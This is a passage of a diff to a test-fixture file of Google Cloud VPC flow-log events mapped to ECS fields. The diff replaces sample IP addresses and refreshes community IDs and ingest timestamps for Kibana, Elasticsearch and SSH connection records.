"{\"insertId\":\"19im82tfdygznr\",\"jsonPayload\":{\"bytes_sent\":\"65184\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.076060079Z", "end": "2019-06-14T03:49:59.565026127Z", @@ -20917,18 +20917,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33564, "bytes": 319459, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 180 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:50u5lJ2RV1XFEhO2zdhxvcEDnVw=", + "community_id": "1:PtUpNPLEJul/LK9u2JbGqtTKFB8=", "bytes": 319459, "name": "default", "transport": "tcp", @@ -20950,7 +20950,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -20987,8 +20987,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869185500Z", - "original": "{\"insertId\":\"19im82tfdygznx\",\"jsonPayload\":{\"bytes_sent\":\"319459\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392335500Z", + "original": 
"{\"insertId\":\"19im82tfdygznx\",\"jsonPayload\":{\"bytes_sent\":\"319459\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866944869Z", "end": "2019-06-14T03:49:59.597079770Z", @@ -21015,18 +21015,18 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60110, "bytes": 519100, "domain": "suricata-iowa", - "ip": "192.0.2.177", + "ip": "192.168.2.177", "packets": 224 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:KL7wHxQCZ0qbnYIzbI2WPJd+SRw=", + "community_id": "1:GfC7CyOdz/yJsL4pM9oUUVW8XIE=", "bytes": 519100, "name": "default", "transport": "tcp", @@ -21048,7 +21048,7 @@ }, "related": { "ip": [ - "192.0.2.177", + "192.168.2.177", "10.139.99.242" ] }, 
@@ -21085,8 +21085,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869188200Z", - "original": "{\"insertId\":\"19im82tfdygzo7\",\"jsonPayload\":{\"bytes_sent\":\"519100\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.177\",\"src_port\":60110},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"224\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392341Z", + "original": 
"{\"insertId\":\"19im82tfdygzo7\",\"jsonPayload\":{\"bytes_sent\":\"519100\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60110},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"224\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:10.874529937Z", "end": "2019-06-14T03:49:46.020466750Z", @@ -21107,10 +21107,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33550, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -21124,7 +21124,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:5jhhJcbdl0291s4YJNbALw8uNfs=", + "community_id": "1:OALwlPDCqpn2fuHuxdc8nnkXpXM=", "bytes": 139513, "name": "default", "transport": "tcp", 
@@ -21147,7 +21147,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -21183,8 +21183,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869191Z", - "original": "{\"insertId\":\"19im82tfdygznb\",\"jsonPayload\":{\"bytes_sent\":\"139513\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143811431Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392346600Z", + "original": 
"{\"insertId\":\"19im82tfdygznb\",\"jsonPayload\":{\"bytes_sent\":\"139513\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143811431Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143811431Z", "end": "2019-06-14T03:49:59.565108649Z", @@ -21213,17 +21213,17 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 41822, "bytes": 0, - "ip": "198.51.100.182", + "ip": "67.43.156.14", "packets": 8 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:d5LNFArWcoFOBS9SH59qLdZmfEw=", + "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -21237,7 +21237,7 @@ }, "related": { "ip": [ - "198.51.100.182", + "67.43.156.14", "10.139.99.242" ] }, 
@@ -21262,8 +21262,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869193700Z", - "original": "{\"insertId\":\"19im82tfdygzne\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"198.51.100.182\",\"src_port\":41822},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:40.058226439Z\",\"packets_sent\":\"8\",\"reporter\":\"DEST\",\"rtt_msec\":\"1439\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392352100Z", + "original": 
"{\"insertId\":\"19im82tfdygzne\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":41822},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:40.058226439Z\",\"packets_sent\":\"8\",\"reporter\":\"DEST\",\"rtt_msec\":\"1439\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:12.068494835Z", "end": "2019-06-14T03:40:40.058226439Z", @@ -21284,10 +21284,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -21301,7 +21301,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:1JiVoUP9ZCGJx3vJg7cg+GheZ8o=", + "community_id": "1:9Sajzk9Kjby8Y6aALULEYfH3nYY=", "bytes": 11109, "name": "default", "transport": "tcp", @@ -21324,7 +21324,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -21360,8 +21360,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869196500Z", - "original": "{\"insertId\":\"1gq7q7afe373fw\",\"jsonPayload\":{\"bytes_sent\":\"11109\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"105\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392357700Z", + "original": 
"{\"insertId\":\"1gq7q7afe373fw\",\"jsonPayload\":{\"bytes_sent\":\"11109\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"105\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466742414Z", "end": "2019-06-14T03:49:51.821291282Z", @@ -21382,10 +21382,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33970, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -21399,7 +21399,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:scGILrXad9XwMVy45aBpAVcS9Bc=", + "community_id": "1:IK2yh3vtbZJ4V3I3kIgCeSldo3I=", "bytes": 173496, "name": "default", "transport": "tcp", @@ -21422,7 +21422,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -21458,8 +21458,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869199200Z", - "original": "{\"insertId\":\"1gq7q7afe373et\",\"jsonPayload\":{\"bytes_sent\":\"173496\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821154389Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392363200Z", + "original": 
"{\"insertId\":\"1gq7q7afe373et\",\"jsonPayload\":{\"bytes_sent\":\"173496\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33970,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821154389Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"rtt_msec\":\"308\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470006631Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470006631Z", "end": "2019-06-14T03:49:51.821154389Z", @@ -21486,18 +21486,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 182861, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 245 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:egds7+adPwr8MrtaK+oAyWTmtL0=", + "community_id": "1:Xg3OPnd3ZD+LZsCDrlk/Kdj91e8=", "bytes": 182861, "name": "default", "transport": "tcp", @@ -21519,7 +21519,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -21556,8 +21556,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869201900Z", - "original": "{\"insertId\":\"1gq7q7afe373f4\",\"jsonPayload\":{\"bytes_sent\":\"182861\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"245\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392368900Z", + "original": 
"{\"insertId\":\"1gq7q7afe373f4\",\"jsonPayload\":{\"bytes_sent\":\"182861\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"245\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150282980Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150282980Z", "end": "2019-06-14T03:49:59.565319136Z", @@ -21578,10 +21578,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -21595,7 +21595,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:HQLAb7M1d/3INTFS0VfYPWDgNSc=", + "community_id": "1:fI3fEoMHmZ6GEw9+CNJ6V2s6dfw=", "bytes": 12145, "name": "default", "transport": "tcp", @@ -21618,7 +21618,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -21654,8 +21654,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869204600Z", - "original": "{\"insertId\":\"1gq7q7afe373eo\",\"jsonPayload\":{\"bytes_sent\":\"12145\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"94\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"v